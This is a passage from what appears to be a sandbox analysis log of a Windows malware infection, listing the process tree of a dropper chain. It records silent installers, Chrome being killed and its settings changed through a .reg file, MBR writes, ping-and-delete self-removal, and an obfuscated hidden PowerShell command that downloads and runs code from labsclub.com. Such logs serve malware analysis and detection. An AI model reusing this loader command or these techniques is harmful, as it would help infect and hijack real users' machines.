        6⤵
        
        PID:2564
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:2568
      - C:\Users\Admin\AppData\Roaming\1614544923394.exe
        
        "C:\Users\Admin\AppData\Roaming\1614544923394.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614544923394.txt"
        6⤵
        
        PID:4680
      - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        6⤵
        
        PID:5868
      - C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        6⤵
        
        PID:1292
      - C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
        
        C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
        6⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\is-SSE0U.tmp\23E04C4F32EF2158.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SSE0U.tmp\23E04C4F32EF2158.tmp" /SL5="$30364,746887,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
        7⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/14Zhe7"
        8⤵
        
        PID:6216
        
        C:\Program Files (x86)\DTS\seed.sfx.exe
        
        "C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
        8⤵
        
        PID:6208
        
        C:\Program Files (x86)\Seed Trade\Seed\seed.exe
        
        "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
        9⤵
        
        PID:6476
        
        C:\Program Files (x86)\Seed Trade\Seed\seed.exe
        
        "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
        9⤵
        
        PID:2972
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe"
        6⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:6676
    - - C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe
        
        C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe 200 installp1
        5⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:2464
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:2776
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe"
        6⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:784
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
        5⤵
        
        PID:4740
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        Runs ping.exe
        
        PID:3852
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
      4⤵
      Executes dropped EXE
      PID:5088
    - - C:\Users\Admin\AppData\Local\Temp\57ANCMOSK2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\57ANCMOSK2\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        
        PID:556
      - C:\Users\Admin\AppData\Local\Temp\57ANCMOSK2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\57ANCMOSK2\multitimer.exe" 1 3.1614545131.603c00eb15246 101
        6⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\57ANCMOSK2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\57ANCMOSK2\multitimer.exe" 2 3.1614545131.603c00eb15246
        7⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\lqdufohg23z\4napgq5ao3u.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lqdufohg23z\4napgq5ao3u.exe" /VERYSILENT
        8⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\is-M91SJ.tmp\4napgq5ao3u.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M91SJ.tmp\4napgq5ao3u.tmp" /SL5="$A01E2,870426,780800,C:\Users\Admin\AppData\Local\Temp\lqdufohg23z\4napgq5ao3u.exe" /VERYSILENT
        9⤵
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\is-FTVNA.tmp\winlthst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-FTVNA.tmp\winlthst.exe" test1 test1
        10⤵
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\R3bej4Wh4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\R3bej4Wh4.exe"
        11⤵
        
        PID:6352
        
        C:\Users\Admin\AppData\Local\Temp\R3bej4Wh4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\R3bej4Wh4.exe"
        12⤵
        
        PID:6528
        
        C:\Users\Admin\AppData\Local\Temp\1614544997729.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1614544997729.exe"
        13⤵
        
        PID:2256
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        14⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:2960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\h0xdvql3icz\safebits.exe
        
        "C:\Users\Admin\AppData\Local\Temp\h0xdvql3icz\safebits.exe" /S /pubid=1 /subid=451
        8⤵
        
        PID:1296
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 696
        9⤵
        Program crash
        
        PID:1128
        
        C:\Users\Admin\AppData\Local\Temp\cqjh50d33k4\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cqjh50d33k4\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\is-UROT9.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UROT9.tmp\vict.tmp" /SL5="$10280,870426,780800,C:\Users\Admin\AppData\Local\Temp\cqjh50d33k4\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:4808
        
        C:\Users\Admin\AppData\Local\Temp\is-CGAP1.tmp\wimapi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CGAP1.tmp\wimapi.exe" 535
        10⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\tP1s5qZRv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tP1s5qZRv.exe"
        11⤵
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\tP1s5qZRv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tP1s5qZRv.exe"
        12⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:5376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:5772
        
        C:\Users\Admin\AppData\Local\Temp\nrgttnpwuet\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nrgttnpwuet\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\is-FIBJA.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FIBJA.tmp\Setup3310.tmp" /SL5="$90046,802346,56832,C:\Users\Admin\AppData\Local\Temp\nrgttnpwuet\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\is-4LFP0.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-4LFP0.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\is-OO4K2.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OO4K2.tmp\Setup.tmp" /SL5="$204B8,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-4LFP0.tmp\Setup.exe" /Verysilent
        11⤵
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\ProPlugin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\ProPlugin.exe" /Verysilent
        12⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\is-IGN5Q.tmp\ProPlugin.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IGN5Q.tmp\ProPlugin.tmp" /SL5="$60424,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-90209.tmp\ProPlugin.exe" /Verysilent
        13⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\is-FMGD5.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-FMGD5.tmp\Setup.exe"
        14⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
        15⤵
        
        PID:6864
        
        C:\Windows\SYSTEM32\TASKKILL.exe
        
        TASKKILL /F /IM chrome.exe
        16⤵
        Kills process with taskkill
        
        PID:7008
        
        C:\Windows\regedit.exe
        
        regedit /s chrome.reg
        16⤵
        Runs .reg file with regedit
        
        PID:7024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chrome64.bat
        16⤵
        
        PID:6204
        
        C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
        17⤵
        
        PID:4372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\chrome64.bat" h"
        18⤵
        
        PID:5428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe"
        19⤵
        
        PID:5808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ff97df96e00,0x7ff97df96e10,0x7ff97df96e20
        20⤵
        
        PID:5348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1840 /prefetch:8
        20⤵
        
        PID:6580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1792 /prefetch:2
        20⤵
        
        PID:6584
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:1
        20⤵
        
        PID:6272
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:1
        20⤵
        
        PID:6608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
        20⤵
        
        PID:7008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
        20⤵
        
        PID:5536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
        20⤵
        
        PID:7036
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
        20⤵
        
        PID:7076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4404 /prefetch:8
        20⤵
        
        PID:5384
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3432 /prefetch:8
        20⤵
        
        PID:5280
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:8
        20⤵
        
        PID:5160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:8
        20⤵
        
        PID:4292
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:8
        20⤵
        
        PID:4252
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
        20⤵
        
        PID:5520
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff629c27740,0x7ff629c27750,0x7ff629c27760
        21⤵
        
        PID:6780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3900 /prefetch:8
        20⤵
        
        PID:4008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3604 /prefetch:8
        20⤵
        
        PID:2748
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3580 /prefetch:8
        20⤵
        
        PID:6680
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3960 /prefetch:8
        20⤵
        
        PID:6828
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3636 /prefetch:8
        20⤵
        
        PID:5880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:8
        20⤵
        
        PID:4584
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3716 /prefetch:8
        20⤵
        
        PID:5108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
        20⤵
        
        PID:6064
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4500 /prefetch:8
        20⤵
        
        PID:7108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4508 /prefetch:8
        20⤵
        
        PID:6024
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=784 /prefetch:8
        20⤵
        
        PID:1372
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 /prefetch:8
        20⤵
        
        PID:6832
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4504 /prefetch:8
        20⤵
        
        PID:6868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3352 /prefetch:8
        20⤵
        
        PID:5160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4288 /prefetch:8
        20⤵
        
        PID:6808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1084 /prefetch:8
        20⤵
        
        PID:5436
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:8
        20⤵
        
        PID:6776
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
        20⤵
        
        PID:3152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:8
        20⤵
        
        PID:4880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4552 /prefetch:8
        20⤵
        
        PID:6756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5428 /prefetch:8
        20⤵
        
        PID:4768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4560 /prefetch:8
        20⤵
        
        PID:7060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=840 /prefetch:8
        20⤵
        
        PID:4464
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 /prefetch:8
        20⤵
        
        PID:6116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1408 /prefetch:1
        20⤵
        
        PID:6068
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:8
        20⤵
        
        PID:7008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4016 /prefetch:8
        20⤵
        
        PID:6852
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5868 /prefetch:8
        20⤵
        
        PID:5880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4304 /prefetch:8
        20⤵
        
        PID:6444
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,11386881421029970341,1292172662850449597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4332 /prefetch:8
        20⤵
        
        PID:5388
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
